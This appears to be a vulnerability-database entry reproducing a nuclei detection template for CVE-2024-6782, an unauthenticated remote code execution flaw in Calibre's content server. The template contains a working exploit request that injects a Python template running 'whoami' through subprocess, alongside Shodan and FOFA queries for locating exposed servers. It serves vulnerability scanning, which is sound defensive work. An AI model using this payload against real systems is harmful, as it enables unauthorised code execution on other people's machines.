nuclei / ProjectDiscovery / NUCLEI:CVE-2024-6782
Aug 01, 2024 - 5:44 a.m.

Calibre <= 7.14.0 Remote Code Execution

2024-08-01 05:44:57
ProjectDiscovery
github.com
cve
cve2024
calibre
remote code execution
unauthenticated
content server

CVSS3: 9.8
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score: 7.8
Confidence: Low

EPSS: 0.002
Percentile: 59.7%

Unauthenticated remote code execution via Calibre’s content server in Calibre <= 7.14.0.

id: CVE-2024-6782

info:
  name: Calibre <= 7.14.0 Remote Code Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    Unauthenticated remote code execution via Calibre’s content server in Calibre <= 7.14.0.
  reference:
    - https://starlabs.sg/advisories/24/24-6781/
  metadata:
    verified: true
    shodan-query: html:"Calibre"
    fofa-query: "Server: calibre"
    max-request: 1
  tags: cve,cve2024,calibre,rce

http:
  - raw:
      - |
        GET /interface-data/books-init HTTP/1.1
        Host: {{Hostname}}
        Referer: {{RootURL}}

    extractors:
      - type: json
        name: book_ids
        internal: true
        json:
          - '.search_result.book_ids[0]'

  - raw:
      - |
        POST /cdb/cmd/list HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        [
            ["template"],
            "",
            "",
            "",
            {{book_ids}},
           "python:def evaluate(a, b):\n  import subprocess\n  try:\n    return subprocess.check_output(['cmd.exe', '/c', 'whoami'])\n  except Exception:\n    return subprocess.check_output(['sh', '-c', 'whoami'])\n"
        ]

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "b'([^']+)"

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ab0c6eb74bbcbd25752d1cb038e1250aae3a1ca7939f89b55c54300ce331fb7f022100e4d96a62a8a103243f43549987b0cbd496172100fa325a425975b072d0482332:922c64590222798bb761d5b6d8e72950
